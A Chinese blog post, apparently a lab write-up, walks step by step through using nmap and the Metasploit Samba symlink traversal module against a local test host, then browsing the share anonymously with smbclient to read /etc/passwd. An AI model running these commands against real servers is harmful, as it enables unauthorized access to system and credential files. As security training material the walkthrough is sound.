美文网首页
Metasploit溢出sysmlink默认配置目录遍历漏洞

Metasploit溢出sysmlink默认配置目录遍历漏洞

作者: Killshadow | 来源:发表于2017-12-18 16:53 被阅读0次

    目的

    利用sysmlink漏洞读取目标主机的passwd文件内容。

    原理

    Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,Samba的Sambd默认配置在可写文件共享时,存在目录便利漏洞,远程用户可以通过smbclient端使用一个对称命令,创建一个包含..的目录遍历符的软连接,可以进行目录遍历以及访问任意文件.

    环境

    攻击环境

    步骤

    一、利用nmap工具扫描目标主机
    1. 命令nmap -sV 192.168.1.3,对目标主机进行端口扫描,发现开放445端口、139端口并且安装Samba软件,版本为3.
    2. 在终端中输入命令msfconsole,启动MSF终端。
    3. 在终端中输入命令search samba,搜索Samba的相关工具和攻击载荷。
    4. 在终端中输入命令use auxiliary/admin/smb/samba_symlink_traversal,启用漏洞利用模块,提示符就会提示进入到该路径下。
    5. 在终端输入命令info,查看需要设置的相关项,yes表示必须填写的参数。
    6. 在终端中输入命令set RHOST 192.168.1.3,设置目标主机的IP地址。
    7. 在终端中输入set SMBSHARE tmp,设置SAM可写文件。
    8. 在终端中输入exploit,开始攻击。
    9. 新打开一个终端,输入smbclient //192.168.1.3/tmp,直接回车,不用输入密码。
    10. 在终端中输入cd rootfs,进入rootfs目录,在终端下输入命令ls,列出目录。
    11. more /etc/passwd
      getshell

    相关文章

      网友评论

          本文标题:Metasploit溢出sysmlink默认配置目录遍历漏洞

          本文链接:https://www.haomeiwen.com/subject/pulmwxtx.html